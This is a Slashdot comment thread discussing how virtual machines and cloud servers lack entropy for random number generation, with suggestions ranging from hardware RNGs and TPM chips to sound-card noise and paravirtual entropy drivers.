Filtering a sound recording Recently I was listening to an MP3 file of a talk about no-till gardening when I noticed that there was a noticable buzz in the sound. I figured I would try my hand at sound filtering with Python as a learning experience. The Python standard library doesn’t have a module for reading mp3 files, but it can handle wav files. So I used the mpg123 program to convert the file; mpg123 -w 20130509talk.wav 20130509talk.mp3 This is quite a big file, so I also extracted a somewhat smaller file for testing; mpg123 -k 7000 -n 2400 -w input.wav 20130509talk.mp3 The interesting portion of this uncompressed stereo wav file is basically a list of 16-bit integers with the left and right channel interspersed. So let us see first how we read data from a wav file and split the values for the channels. All this is done using Python version 2.7, but 3.3 should work as well. import wave import numpy as np import matplotlib.pyplot as plt wr = wave.open('input.wav', 'r') sz = 44100 # Read and process 1 second at a time. da = np.fromstring(wr.readframes(sz), dtype=np.int16) left, right = da[0::2], da[1::2] The first three lines are for importing the modules that we need for this code to work. The wave module is part of the standard library that comes with Python. The numpy (short for “numerical Python”) and matplotlib modules have to be installed seperately. The wave.open() function opens the sound file for reading in this case. In this case the sound was sampled at 44.1 kHz. This is called the frame rate. I choose to analyse the sound in one second chunk for reasons that I’ll go into later. The readframes() method reads from the sound file and returns the data as a string. The fromstring() function from the numpy library converts the binary string into an array of 16 bit integers. The last line splits the array into the left and right channel arrays. One of the standard ways to analyze sound is to look at the frequencies that are present in a sample. The standard way of doing that is with a discrete Fourier transform using the fast Fourier transform or FFT algorithm. What these basically in this case is to take a sound signal isolate the frequencies of sine waves that make up that sound. So we are going to use the np.fft.rfft() function. This is meant for data that doesn’t contain complex numbers but just real numbers. lf, rf = np.fft.rfft(left), np.fft.rfft(right) The function np.fft.rfft() returns 1/2+1 as many numbers as it was given. This is because of the inherent symmetry in the transform. If the array were just as long as the input, the second half would be a mirror image of the first half. So for a sample of 44100 sounds, we get the intensity of the frequency from 0 to 22050 Hz. Which not accidentally covers the whole range that humans can hear. Let’s plot a figure of the sound and the frequencies of the left channel: import matplotlib.pyplot as plt plt.figure(1) a = plt.subplot(211) r = 2**16/2 a.set_ylim([-r, r]) a.set_xlabel('time [s]') a.set_ylabel('sample value [-]') x = np.arange(44100)/44100 plt.plot(x, left) b = plt.subplot(212) b.set_xscale('log') b.set_xlabel('frequency [Hz]') b.set_ylabel('|amplitude|') plt.plot(abs(lf)) plt.savefig('sample-graph.png') This figure is shown below. The top plot shows the typical combination of sine-wave structures of sound. But there is little there for us to see at first sight. The bottom plot is more interesting. It shows one big spike at and around 60 Hz. This is the frequency used for AC in the USA were the recording was made, and it was very noticable in the recording. An AC circuit has two lines, power and neutral. Through damage in a wall or outlet the neutral wire can sometimes also carry a small amount of power. This reaches the microphone and is recorded. I made plots from several portions of the file, and this was the only big spike that was constantly there. When recording using the built-in microphone on a laptop a good way to prevent this is to disconnect the battery charger when recording. The way to filter that sound is to set the amplitudes of the fft values around 60 Hz to 0, see (2) in the code below. In addition to filtering this peak, I’m also going to remove the frequencies below the human hearing range (1) and above the normal human voice range (3). Then we recreate the original signal via an inverse FFT (4). lowpass = 21 # Remove lower frequencies. highpass = 9000 # Remove higher frequencies. lf[:lowpass], rf[:lowpass] = 0, 0 # low pass filter (1) lf[55:66], rf[55:66] = 0, 0 # line noise filter (2) lf[highpass:], rf[highpass:] = 0,0 # high pass filter (3) nl, nr = np.fft.irfft(lf), np.fft.irfft(rf) # (4) ns = np.column_stack((nl,nr)).ravel().astype(np.int16) The last line combines the left and right channels again using the column_stack() function, interleaves the left and right samples using the ravel() method and finally converts them to 16-bit integers with the astype() method. Plotting the changed sound and fft data again produces the figure below; The big spike is now gone, as are the low and high tones. Looking back at the original and changed sound data, we can now see how the 60 Hz tone dominated the original sound data plot. The resulting data can be converted to a string and written to a wav file again. This example was just for a one second sound sample. So to convert a complete file we have to loop over the whole contents. The complete program used to filter the complete file is given below; import wave import numpy as np # compatibility with Python 3 from __future__ import print_function, division, unicode_literals # Created input file with: # mpg123 -w 20130509talk.wav 20130509talk.mp3 wr = wave.open('20130509talk.wav', 'r') par = list(wr.getparams()) # Get the parameters from the input. # This file is stereo, 2 bytes/sample, 44.1 kHz. par[3] = 0 # The number of samples will be set by writeframes. # Open the output file ww = wave.open('filtered-talk.wav', 'w') ww.setparams(tuple(par)) # Use the same parameters as the input file. lowpass = 21 # Remove lower frequencies. highpass = 9000 # Remove higher frequencies. sz = wr.getframerate() # Read and process 1 second at a time. c = int(wr.getnframes()/sz) # whole file for num in range(c): print('Processing {}/{} s'.format(num+1, c)) da = np.fromstring(wr.readframes(sz), dtype=np.int16) left, right = da[0::2], da[1::2] # left and right channel lf, rf = np.fft.rfft(left), np.fft.rfft(right) lf[:lowpass], rf[:lowpass] = 0, 0 # low pass filter lf[55:66], rf[55:66] = 0, 0 # line noise lf[highpass:], rf[highpass:] = 0,0 # high pass filter nl, nr = np.fft.irfft(lf), np.fft.irfft(rf) ns = np.column_stack((nl,nr)).ravel().astype(np.int16) ww.writeframes(ns.tostring()) # Close the files. wr.close() ww.close() This technique works pretty well for these kind of disturbances, i.e. those that are very localized in the frequency domain. During part of the talk there is a noticable sound or rushing air, which I suspect came from an airco unit or a laptop’s cooling fan. This gave no noticable single big spike. There were some smaller spikes but filtering those out wasn’t sufficient to eliminate them, probably because the sound was composed out of multiple harmonics. Additionally those spikes where in the frequency range of the normal spoken voice, so filtering them affected the talk too much.
http://rsmith.home.xs4all.nl/miscellaneous/filtering-a-sound-recording.html
CC-MAIN-2019-26
refinedweb
1,331
75.61
MPROTECT(2) BSD Programmer's Manual MPROTECT(2) mprotect - control the protection of pages #include <sys/types.h> #include <sys/mman.h> int mprotect(void *addr, size_t len, int prot); The mprotect() system call changes the specified pages to have protection prot. Not all implementations will guarantee protection on a page basis; the granularity of protection changes may be as large as an entire re- gion. The protections (region accessibility) are specified in the prot argument by OR'ing the following values: PROT_EXEC Pages may be executed. PROT_READ Pages may be read. PROT_WRITE Pages may be written. PROT_NONE No permissions. Upon successful completion, a value of 0 is returned. Otherwise, a value of -1 is returned and errno is set to indicate the error. madvise(2), mincore(2), msync(2), munmap(2) The mprotect() function first appeared in 4.4BSD..
https://www.mirbsd.org/htman/i386/man2/mprotect.htm
CC-MAIN-2016-07
refinedweb
140
51.34
import "rsc.io/qr/coding" Package coding implements low-level QR coding details. Field is the field for QR error correction. Alpha is the encoding for alphanumeric data. The valid characters are 0-9A-Z$%*+-./: and space. type Code struct { Bitmap []byte // 1 is black, 0 is white Size int // number of pixels on a side Stride int // number of bytes per row } A Code is a square pixel grid. Encoding implements a QR data encoding scheme. The implementations--Numeric, Alphanumeric, and String--specify the character set and the mapping from UTF-8 to code bits. The more restrictive the mode, the fewer code bits are needed. A Level represents a QR error correction level. From least to most tolerant of errors, they are L, M, Q, H. A Mask describes a mask that is applied to the QR code to avoid QR artifacts being interpreted as alignment and timing patterns (such as the squares in the corners). Valid masks are integers from 0 to 7. Num is the encoding for numeric data. The only valid characters are the decimal digits 0 through 9. A Pixel describes a single pixel in a QR code. A PixelRole describes the role of a QR pixel. const ( Position PixelRole // position squares (large) Alignment // alignment squares (small) Timing // timing strip between position squares Format // format metadata PVersion // version pattern Unused // unused pixel Data // data bit Check // error correction check bit Extra ) type Plan struct { Version Version Level Level Mask Mask DataBytes int // number of data bytes CheckBytes int // number of error correcting (checksum) bytes Blocks int // number of data blocks Pixel [][]Pixel // pixel map } A Plan describes how to construct a QR code with a specific version, level, and mask. NewPlan returns a Plan for a QR code with the given version, level, and mask. String is the encoding for 8-bit data. All bytes are valid. A Version represents a QR version. The version specifies the size of the QR code: a QR code with version v has 4v+17 pixels on a side. Versions number from 1 to 40: the larger the version, the more information the code can store. DataBytes returns the number of data bytes that can be stored in a QR code with the given version and level. Package coding imports 4 packages (graph) and is imported by 9 packages. Updated 2018-07-12. Refresh now. Tools for package owners.
https://godoc.org/rsc.io/qr/coding
CC-MAIN-2020-50
refinedweb
401
64.81
I am trying to target a particular styling for all browsers except for ie9 and below. I did this to target IE9 and below: <!--[if lte IE 9]> <link rel="stylesheet" href="css/ie/ie.min.css"> <![endif]--> <!--[if lt IE 9]> <link rel="stylesheet" href="css/ie/ie.min.css"> <![endif]--> <!--[if IE 9]> <link rel="stylesheet" href="css/ie/ie-9.min.css"> <![endif]--> <!--[if gt IE 9]><!--> <link rel="stylesheet" href="css/normal.min.css"> <!--<![endif]--> This method should provide you with separate stylesheets for less than IE 9, IE 9, and more than IE 9 (including all non-IE browsers). The trick for the last conditional is <!--> and <!--<!, which cause Edge and non-IE browsers to interpret the if and endif as separate comments. To target a single version in particular, use <!--[if IE #]>. As pointed out by jkdev, since IE 9 is the last version to support conditional comments, the last conditional could have been written: <!--[if !IE]><!--> <link rel="stylesheet" href="css/normal.min.css"> <!--<![endif]--> The result would be the same as the first snippet: only IE 10-11, Edge, and non-IE browsers would get css/normal.min.css. None of the earlier IE versions would get this file since they would evaluate if !IE. See also Conditional comments for Internet Explorer.
https://codedump.io/share/uKg98wlMMfAS/1/how-do-i-target-css-styling-to-other-browsers-except-for-ie9
CC-MAIN-2017-43
refinedweb
220
68.26
cgroups man page cgroups — Linux control groups Description Control cgroups,). Terminology. Cgroups version 1 and version 2-v2.txt.) Because of the problems with the initial cgroups implementation (cgroups version 1), starting in Linux 3.10, work began on a new, orthogonal implementation to remedy these problems. Initially marked experimental, and hidden behind the -o _. Cgroups version 1 Under cgroups v1, each controller may be mounted against a separate cgroup filesystem that provides its own hierarchical organization of the processes on the system. It is also possible addition, in cgroups v1, cgroups can be mounted with no bound controller, in which case they serve only to track processes. (See the discussion of release notification below.) An example of this is the name=systemd cgroup which is used by systemd(1) to track services and user sessions. Tasks (threads) versus processes. Because this ability caused certain problems, the ability to independently manipulate the cgroup memberships of the threads in a process has been removed in cgroups v2. Cgroups v2 allows manipulation of cgroup membership only for processes (which has the effect of changing the cgroup membership of all threads in the process). Mounting v1 controllers -t cgroup -o cpu none /sys/fs/cgroup/cpu It is possible to comount multiple controllers against the same hierarchy. For example, here the cpu and cpuacct controllers are comounted against a single hierarchy: mount -t cgroup -o -t cgroup -o all cgroup /sys/fs/cgroup (One can achieve the same result by omitting -o. Cgroups version 1 controllers-bwc.txt. - cpuacct (since Linux 2.6.24; CONFIG_CGROUP_CPUACCT) This provides accounting for CPU usage by groups of processes. Further information can be found in the kernel source file Documentation/cgroup-v whitelists and blacklists.. Creating cgroups and moving processes (but not cgroups v. This file is not present in cgroup v2 directories. Removing cgroups. Cgroups v1 release notification with a process. The default value of the release_agent file is empty, meaning that no release agent is invoked.. Cgroups version 2. - 1. Cgroups v2 provides a unified hierarchy against which all controllers are mounted. - 2. "Internal" processes are not permitted. With the exception of the root cgroup, processes may reside only in leaf nodes (cgroups that do not themselves contain child cgroups). -. Cgroups v2 unified hierarchy In cgroups v1, the ability to mount different controllers against different hierarchies was intended to allow great flexibility for application design. In practice, though, the flexibility turned out. Cgroups v2 “no internal processes” rule. Cgroups v2 subtree control When a cgroup A/b is created, its cgroup.controllers file contains the list of controllers which were active in its parent, A. This is the list of controllers which are available to this cgroup. No controllers are active until they are enabled through the cgroup.subtree_control file, by writing the list of space-delimited names of the controllers, each preceded by '+' (to enable) or '-' (to disable). If the freezer controller is not enabled in /A/B, then it cannot be enabled in /A/B/C. Cgroups v2 cgroup.events file With cgroups v2, a new mechanism is provided to obtain notification about when a cgroup becomes empty. The cgroups v1 release_agent and notify_on_release files are removed, and replaced by a new, more general-purpose file, cgroup.events. This generate POLLPRI events. The cgroups v2 notify_on_release mechanism. /proc files - : - 1. The name of the controller. - 2. The unique ID of the cgroup hierarchy on which this controller is mounted. If multiple cgroups v1 controllers are bound to the same hierarchy, then each will show the same hierarchy ID in this field. The value in this field will be 0 if: - a) the controller is not mounted on a cgroups v1 hierarchy; - b) the controller is bound to the cgroups v2 single unified hierarchy; or - c) the controller is disabled (see below). - 3. The number of control groups in this hierarchy using this controller. - 4. This field contains the value 1 if this controller is enabled, or 0 if it has been disabled (via the cgroup_disable kernel of the form: hierarchy ID in /proc/cgroups. For the cgroups version 2 hierarchy, this field contains the value 0. - 2. For cgroups version 1 hierarchies, this field contains a comma-separated list of the controllers bound to the hierarchy. For the cgroups version 2 hierarchy, this field is empty. - 3. This field contains the pathname of the control group in the hierarchy to which the process belongs. This pathname is relative to the mount point of the hierarchy. Errors The following errors can occur for mount(2): - EBUSY An attempt to mount a cgroup version 1 filesystem specified neither the name= option (to mount a named hierarchy) nor a controller name (or all). Notes A child process created via fork(2) inherits its parent's cgroup memberships. A process's cgroup memberships are preserved across execve(2). See Also prlimit(1), systemd(1), systemd-cgls(1), systemd-cgtop(1), clone(2), ioprio_set(2), perf_event_open(2), setrlimit(2), cgroup_namespaces(7), cpuset(7), namespaces(7), sched(7), user_namespaces(7) Colophon This page is part of release 4.13 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at. Referenced By cgroup_namespaces(7), cpuset(7), getrlimit(2), ioprio_set(2), namespaces(7), poll(2), proc(5), sched(7), sysfs(5), systemd.exec(5).
https://www.mankier.com/7/cgroups
CC-MAIN-2017-47
refinedweb
900
57.06
." Another advantage for TPM chips... (Score:4, Informative) TPM chips have their bad things, but one thing they do offer is a cryptographically secure RNG. Its completely understandable not to trust it 100% completely, but you can use the random number stream it puts out as a good addition to the /dev/random number pool. Re:Another advantage for TPM chips... (Score:5, Insightful) Or you could plug in a microphone. Any USB device (Score:2) Or you could plug in a microphone. Assign all of he virtual servers a unique 256 bit ID. XOR that with 256 bits of input of any USB device that measures the real world, and send it through a hash algorithm. USB devices are easy for virtual servers to access. Perhaps better, have a 256 bit seed for each server as above, but have the host server distribute 256 bits at startup time using a microphone run through a hash algorithm. Build one of these (Score:2) Re: (Score:2) Unless you wanted all of the servers (and all of the VMs on each server) to have *different* entropy sources, which was the whole point of TFA. Unless you run a lot of single-device racks each in their own room you're just going to end up with an expensive way to get exactly the same "random" data on each machine. There's also some correlation between things like disk activity and sound output of the machine; there may be some entropy available in the ambient sound -- it may even be chaotic -- but it's certa Re: (Score:2) Re:Another advantage for TPM chips... (Score:5, Insightful) First, real-world images are not very random just be virtual of being part of the real world; random things also need to happen. This is particularly mostly-static images like you'd see in 24/7 web cams -- there is not much entropy available. Second, most of the reason we want random data for seeing purposes is because the seed needs to be something an attacker cannot derive. The output of truly random number generator cannot be predicted by a remote attacker, but publicly available video streams most certainly can, so any source that sends the same data to more than one person is not suitable for things like cryptography. Frankly that's the whole point of the article; if there are many VMs on the same host, or many real hosts on the same hardware and network, started at the same time, and using the same source for entropy they will all generate the same "random" number. Finally, this is a well-solved problem. Many CPUs and motherboards include a hardware RNG that is perfectly sufficient both in terms of randomness and speed for typical PRNG seeding needs. VIA has had one directly in all their CPUs for a long time, Intel includes one in their firmware hubs, and I'm sure there are similar options on most other architectures. Using that on-board RNG to individually seed each VM/host would solve the problem described in the article. There's no reason to try to invent ways to get random data unless you have very specific requirements not met by the existing solutions, as you're quite likely to come up with something inferior either in design or implementation. Re: (Score:2) The Eiffel tower hasn't changed that much in the past 110 years... The MIT (IIRC) used to have a random data feed generated from a webcam and a lava lamp. I guess each datacenter ought to invest in a lavalamp... Correction : after a quick Google, it seems that it was SGI [wired.com], and that they actually patented the thing (which may or may not mean something depending on your jurisdiction). The site was (and still is apparently) lavarnd.org [lavarnd.org]. Re: (Score:2) Re:Another advantage for TPM chips... (Score:5, Informative) You don't need a mic. The resistor noise on the sound card inputs is present and of secure quantum origin, regardless of whether a microphone is plugged in. The microphone noise is louder, but it's much harder to determine how much secure entropy is present. Why trust it when you don't have to? There's plenty available for most purposes without it. The Turbid [av8n.com] program does this in an efficient and secure manner (and they have a paper discussing the details, along with the relevant proofs, for the curious). Re: (Score:2) That's even worse than the microphone idea -- every server and VM within 20 miles of you would have the same source for "random" data. And that's ignoring the fact that clouds aren't random at all; they change in very well-understood ways given the wind, humidity, temperature, etc. The path, shape and density of clouds can be predicted in general terms a week in advance, and pretty specifically over the course of a few minutes. Re: (Score:2) While you are right that using these methods for realtime key generation could be predictable gene Re: (Score:2) You're assuming that more noise is equivalent to more entropy -- that may or may not be true. People typically walk at a fairly even cadence, speak in a certain frequency range. Traffic noise has a predictable dopler shift and fairly well-characterized frequency distribution. And most importantly, the data isn't secret so someone else could just slap up a second mic next to yours and record the data. Regardless, it's far from an optimal solution even if you assume that no dedicated hardware RNG is available. Re: (Score:2) Re: (Score:2) They do? It's secure crypto hardware.. what's evil about that? Yes you have scary evil like Palladium but you don't have to install it if you don't want to. And if machines take control you can always disable the device from the BIOS.. (given you don't care about any data which has encryption keys stored only in the module) Re: (Score:2) Re:Another advantage for TPM chips... (Score:4, Informative) Most of the RNG chips publish pretty good specifications on the design of their entropy source, the amount of real entropy it provides, and the circumstances in which that entropy level might be reduced. There could be implementation or production errors or course, just like there could be runtime or compiler errors with software, but the design is available for perusal and has been analyzed. For example, the Intel 82802: [cryptography.com] Re: (Score:2) That's not true of TPM chips, whose insides are secret (unless you have a SEM.) Re: (Score:2) Black box testing isn't all that productive for RNGs. You can check distribution and very simple patterns, but beyond that it's a major headache. White box testing makes things much easier. Yay source code! Good luck for testing the validity of a random generator from source code. This is major Ju-Ju. Generated randomness is deep black majick. It's *waaaay* simpler and efficient to just test the output over a few X runs for a very large X. That's not to say that source code isn't useful to check for glaring mistakes, but if you want to check the validity of an algorithm by looking at it, you'd better be a professional mathematician with specific interests. Re: (Score:2) Re: (Score:2) Re: (Score:2) Re: (Score:2, Insightful) > There's no reason the host can't export that same /dev/random to the guest; > certainly to ensure there is sufficient entropy on startup. Wouldn't the low-budget solution to this entire issue be the simple deferral of SSH key creation and the like for a few minutes past the initial boot-up? Getting creative (Score:3, Interesting) Re:Getting creative (Score:4, Funny) Well, clearly that "Linux" thing is a toxic gas weapon being used by the reds. Ya, I'd worry about them blowing up a chemical weapon in the clouds. They obviously got the technology from the Nazi's (no, not a candidate for Godwin's law). I don't know about you, but I'm grabbing my M1 Garand and heading down to the shelter under the house. Once that Linux stuff clears, I'll they'd better have thought twice about attackin' my good ol US of A. Well, you asked what they would have though 50 years ago, didn't you? :) Re:Getting creative (Score:5, Interesting) There's little solid matter left. Nobody really knows why; the legends tell of ancient, sprawling empires releasing great monsters that consume worlds and deliver energy to fuel their eons-old wars in the cold between the stars. Several human colonies survived the Last Scourge. One even knew something of their people's history. This colony of merchant-scholars thrived in an old space-borne city drifting about a great lightyears-long dust cloud inexplicably left untouched by the wars. The city was old, very old, built by a generation of master engineers who etched their likenesses in the great canvases of the city's impervious white construction. Quiet machinery lurked untouched in the mysterious depths of the undercity, seen only by outcasts wandering alone through those vast echoing chambers. The city provided everything the civilization needed. Somehow (so much seemed like magic to them that even the usually-curious humans grew bored of speculation) their reservoirs filled with water, their air recycled, and their waste disappeared down bottomless shafts. All of their needs were filled, but they craved expansion and exploration. They were able to harvest some limited chemical energy from the food supplied by the city, and build using scrap. Still, entropy was a problem in the dust cloud of Linux. Re: (Score:2) I'll bite. that's an interesting story. where's it from? Re: (Score:3, Interesting) Re: (Score:3, Interesting) You should. It is well written and has good ideas in it. Re: (Score:2) "w00t" is what I imagine the geek would be thinking. Why is this done in software at all? (Score:3, Interesting) Why can't the CPU contain a register which holds a random number which is updated with every clock cycle? Re: (Score:3, Insightful) Re:Why is this done in software at all? (Score:5, Insightful) Re:Why is this done in software at all? (Score:5, Informative) First, the cost of computing truly random numbers is way too high for that, unless you are performing an iterative approach to random number generation (and then you have the problem of predictability). It could be done, but you'd be pumping a lot of hardware into computing values that would be thrown away 99.9%+ of the time. Secondarily, if your PRNG algorithm is broken, you're stuck replacing the hardware. At least a bad software PRNG can be replaced. That said, hardware PRNG is provided in many modern systems by a TPM [wikipedia.org]. It lacks the performance problems associated with your solution, since it only generates random numbers on demand. It still has the problem of a potential exploit being discovered leading to expensive hardware upgrades, but to my knowledge that has not been a problem to date. Re:Why is this done in software at all? (Score:4, Insightful) Why can't the CPU contain a register which holds a random number which is updated with every clock cycle? First, the cost of computing truly random numbers is way too high for that Computers are deterministic. Truly random numbers cannot be computed, they can only be provided by special hardware (something that can measure shot noise or thermal noise, a camera pointed at a lava lamp, a movement detector in Schrodinger's cat's box). Secondarily, if your PRNG algorithm is broken, you're stuck replacing the hardware. That's why you don't do pseudo-random numbers, but real randomness from thermal noise or shot noise or some other quantum effect (cats and lava lamps don't fit on ICs). That said, hardware PRNG is provided in many modern systems by a TPM. And at some level, the randomness generator on the TPM almost certainly has an interface of "read this special register every X clock cycles" (because how else would you interface with your special hardware?). It lacks the performance problems associated with your solution, since it only generates random numbers on demand. If it's implemented in hardware (as it must be, to get true randomness), it's always running and there is no "on demand". It still has the problem of a potential exploit being discovered leading to expensive hardware upgrades, but to my knowledge that has not been a problem to date. That would be because it's a RNG instead of a PRNG. Re: (Score:2) That's why you don't do pseudo-random numbers, but real randomness from thermal noise or shot noise or some other quantum effect (cats and lava lamps don't fit on ICs). A small radiation source/detector, like the ones in smoke detectors, can work just fine for this purpose. Since radiation is the result of quantum interactions, the output is truly random due to the nature of the universe. Re: (Score:2) Re: (Score:2) Only if you demand perfect randomness (for which there is little practical use in typical computers). And even then "perfect" only means "perfectly preserving randomness" not "correctly detecting every single event/non-event". Given the relative simplicity of a radiation detector "perfect" or some very close equivalent thereto is probably not all that unrealistic anyway. Re:Why is this done in software at all? (Score:4, Interesting) Why can't the CPU contain a register which holds a random number which is updated with every clock cycle? Some do have something like that [via.com.tw], although it's only about 800kbps instead of 4 bytes per cycle. Re: (Score:2) There are CPUs (or more often, chipsets) that provide RNGs, along with a few other hardware implementations of crypto algorithms. Most of them are meant for smaller computers, though, like the VIA C3. I wish they were more widespread and used. Re: (Score:2) Many do. VIA has had CPU-integrated dual-oscillator hardware RNGs for a long time. Intel firmware hubs also commonly contain a hardware RNG, as do other motherboard architectures. They aren't very fast sources of random data -- it's actually pretty hard to get truly random data, even outside the world of desktop CPUs -- but they are fast enough to provide a relatively long seed for a PRNG within seconds of boot. Assuming you use a reasonable PRNG, providing a truly random seed is sufficient to let the PRNG g Surely Not. (Score:3, Insightful) Generating SSH keys involves interaction via at least keyboard and possibly mouse at a terminal. Surely that basic permise is enough to provide enough entropy for the pseudo-random generator. Also, the date and time (as sources of random) can't be virtualized of course. Not surely (Score:4, Interesting) Generating SSH keys involves interaction via at least keyboard and possibly mouse at a terminal. SSH host keys are often generated automatically when the init script notices there aren't any. Re: (Score:2) Generating SSH keys involves interaction via at least keyboard and possibly mouse at a terminal. If you use PuTTY, yes. OpenSSH, at least, doesn't require anything in particular, just a sufficient amount of entropy. On a properly configured system, moving a mouse or banging randomly on the keyboard might feed entropy -- but then, so would plugging a microphone into the sound card, or any number of other things. And as Kaseijin mentions, this is about host keys. Especially in a virtualized environment, you can't assume any sort of human interaction when these keys are generated. Re: (Score:2) Last I checked the date and time are anything but random. Much ado about nothing. (Score:5, Funny) All this complaining over random numbers is silly. All you really have to do is use 5. It's just as random as any other number, and it's easy to generate a 5. -Taylor Re: (Score:2) "and it's easy to generate a 5" And you can generate it at any random point in time too. But somehow, being as random as anyone else, I prefer 42. Re:Much ado about nothing. (Score:5, Funny) This only proves how easy it is to generate a (5, Funny). Re: (Score:3, Funny) int getRandomNumer() // chosen by fair dice roll. // guaranteed to be random. { return 4; } Re: (Score:2) [xkcd.com] Probably obvious to everyone - just to make sure Mr. Munroe gets the credits he deserves. Re: (Score:2) It's cool, it's different because you used a 5. Re: (Score:2) No, the only true random number is 17. This was asserted by several mathematicians who used several lines of reasoning (one rather like this [flickr.com]). Then you get the random sequence 17,17,17... and the random rational 0.17171717... and lots of other perfectly good random numbers. Though you probably shouldn't use them as a source for cryptographically strong random numbers. Re: (Score:3, Insightful) Interesting that both Dilbert (years ago) and xkcd (more recently) both contain a comic with a similar joke... Re: (Score:2) Hell! I have been using 42 for long. And you know that's the Answer to Life, The Universe and Everything, including but not limited to generating Random Number I suppose. I bet it works better than 5. Big problem, but addressable (Score:4, Interesting) Java code that does cryptography or generates UUIDs (in the hope that they will be a truly universal key for something) operates under similar problems. JavaScript is even worse; all it has is the time, perhaps the user's window-size (not very random if maximised) and mouse-movements, and the built-in random() method, which is not expected to be of cryptographic quality. Re: (Score:2) Interesting idea, though I would recommend HTTPS (pre-shared self signed cert would be sufficient for in-house use). If predictability is the problem you're trying to avoid, you want to skirt the packet sniffers. By the way, why write to /dev/urandom, and not /dev/random? Doesn't /dev/urandom act as a front for /dev/random except when the entropy pool is empty (at which point it goes pseudo-random). Just curious. Re:Big problem, but addressable (Score:5, Informative) If you write. The only possible solution is for the hypervisor (Xen for Amazon) to provide a simulated HW RNG that pulls entropy from a real HW RNG or from an entropy daemon in the hypervisor. The best way to learn about Linux RNG basics is Gutterman et. al. Analysis of the Linux Random Number Generator [iacr.org]. Several of the issues they describe have been addressed, such as their PFS concerns, but their description of the entropy pools is still accurate. Re: (Score:2) Dang, you're right. Thanks for the post. Re: (Score. If we're talking about a VM, what's wrong with setting up a point-to-point link with the host machine and accessing an entropy source over that, Linux has a paravirtual entropy driver (Score:5, Insightful) CONFIG_HW_RANDOM_VIRTIO enables it. It's been there for quite a while. We could easily support it in KVM but I've held back on it because to really solve the problem, you would need to use /dev/random as an entropy source. I've always been a bit concerned that one VM could starve another by aggressively consuming entropy. lguest does support this backend device though. Re: (Score:2) Re: (Score:2) I guess you could set it as an option, but the threshold between a useful amount of entropy and what it would take to starve another is often overlappng, so it wouldn't be much help in any but the most controlled situations--which is exactly when you wouldn't need the option. Re: (Score:2) I don't understand how entropy consumption is fundamentally different than I/O consumption or memory consumption, or why it would need a different solution to the problem of competing demands for scarce resources. Re: (Score:2) Wouldn't it be sufficient to use the host random pool as a seed for some sort of strong PRNG? Re: (Score:3, Funny) I heard the aliens from zeta reticuli utilize paravirtual entropy drivers to get to earth. Re: (Score:2) try scaling that up, and see where it ends up... evidence that cloud is a fad? (Score:2, Interesting) Re: (Score:3, Insightful) It is a tool in the bucket. That what it is. There will be a huge growth spurt, then they realize that it won't solve everything. Then they will cut back and still use it until they find something better. Support via "Guest Additions"? (Score:2, Insightful) Eh? (Score:4, Interesting) If you "need" cloud computing, then you're bright enough to install an entropy daemon on one of the machines and maybe even slap a hardware-based RNG on it (probably worth sourcing a VIA or similar just for this purpose, to be honest). It's not hard. Anything else, your "randomness" really doesn't matter and the standard entropy will be just fine. Re: (Score:2) Re: (Score:3, Insightful) A bold assertion. I assume you're thinking of TCP sequence numbers or similar. Otherwise, I call bullshit on the "ANY". And the entropy provided by being connected to a network in any way, shape or form is enough for that purpose. Even in general, unless you're generating LOTS of SSH/SSL keys on some kind of automated process schedule, you're fine, and that's the sort of task that should be pushed out to a dedicated entropy machine. Otherwise, every ADSL router etc. in the WORLD would be worthless - no keybo Re: (Score:2) If you "need" cloud computing, then you're bright enough to install an entropy daemon on one of the machines and maybe even slap a hardware-based RNG on it (probably worth sourcing a VIA or similar just for this purpose, to be honest). It's not hard. Err... yes, it is. Where does your entropy daemon get its entropy from? How do you install the hardware given that you're running in a VM hosted on somebody else's machine, located in somebody else's datacentre? This is an issue that can only be solved by the No one wants to make money off the Interwebs! (Score:3, Insightful) Yes. Because no one on the Internet has any use for gathering venture capital or selling products. It IS an overused term, but you're not testing some product or how people are using it, you're really just testing the security models of various operating systems to determine which are more ready to support those concepts that people grouped together and called "cloud computing". There were a lot of various concepts that were grouped together that comprised the "Net 2.0" concept too...and that cliche was just as derided for being overused. And yet, websites that aren't all ajaxed up or don't use css seem pretty old-fashioned these days. That said, the question I have is how ready for those "cloud computing" concepts is Windows, really? How much of that security model is using the proper approach to securing a transaction instead of just shutting down that path altogether? Definition of Cloud skewed (Score:2, Informative) Re: (Score:2) While the origin of the issue is the virtualization layer, it is more specifically a cloud problem because most IaaS/VPS providers use standard images with a public random seed file, so everybody's machine initializes up to the same state (RTC + random seed + handful of interrupts). Re: (Score:3, Informative) This is not a "cloud" problem. This is a virtual server and image problem. Clouds have nothing to do with virtual servers. If you use a service like NewServers.com, you can get dedicated physical servers for your cloud, on-demand and at hourly prices. Expanding on the other answer you've, here's the basic problem: I can take a virtual server, install an image with a well-known PRNG seed in it, and use it for a little while. While it's used the PRNG is updated by entropy in an unpredictable way, resulting eve GoDaddy VPS - SSH keys identical (Score:2) Re: (Score:2) Does this happen every time or just at random? (Excuse the pun). FTA... (Score:5, Funny) I'm glad he cleared that up for me. Re: (Score:2) So, it resembles an act of Congress then. (Although one could argue that by simultaneously fulfilling both opposing states, Congress is more like a quantum computing machine.) HotBots random number generator (Score:2) There's a simple random number generator based on a radioactive source [fourmilab.ch] on-line. That can be accessed through a Java app, and the hardware info needed to build one of your own is on line. There are commercial random number generators. [comscire.com] USB, even. A serious data center should have a few of these. May also affect IP sequence number generation (Score:2) Running nmap against the same host but the physical OS (currently FC-11) gives: The generation of random numbers... (Score:5, Funny) As has been so often said, the generation of random numbers is too important to be left to chance. :-) Old hat? (Score:4, Informative) Disclaimer: I work for a hosting company doing VPS/cloud hosting. This is pretty old-hat. First, the host-keys issue inside pre-generated images is a very obvious one, although I'm not too surprised that companies aren't considering it. RNG issues aren't quite as obvious, but they're not super-secret either, anyone with any amount of background in security has been aware of this for a while. In fact, questions regarding RNGs have even surfaced in the ##xen IRC channel (freenode.org) because it is a very important issue to some. In particular, those with the need for hardware RNG solutions have come seeking assistance. I'm certainly not minimizing the issue, just noting that it isn't really a new one at all. More than anything, is that the average systems administrator has been slow to realize this, and developers even less so. problem has been solved (Score:3, Informative) Any app that cares about randomness and security (Score:2) ...should be importing it explicitly (eg to create important crypto keys) from an external source, such as random.hd.org (mine) or random.org or whatever. Rgds Damon Use Linux-VServer/OpenVZ or LXC (Score:3, Informative) Those just use process-namespaces and the same kernel and you are done with it. Re:Doesn't SSH use OpenSSL? (Score:5, Informative) OpenSSL has a cryptographically secure random 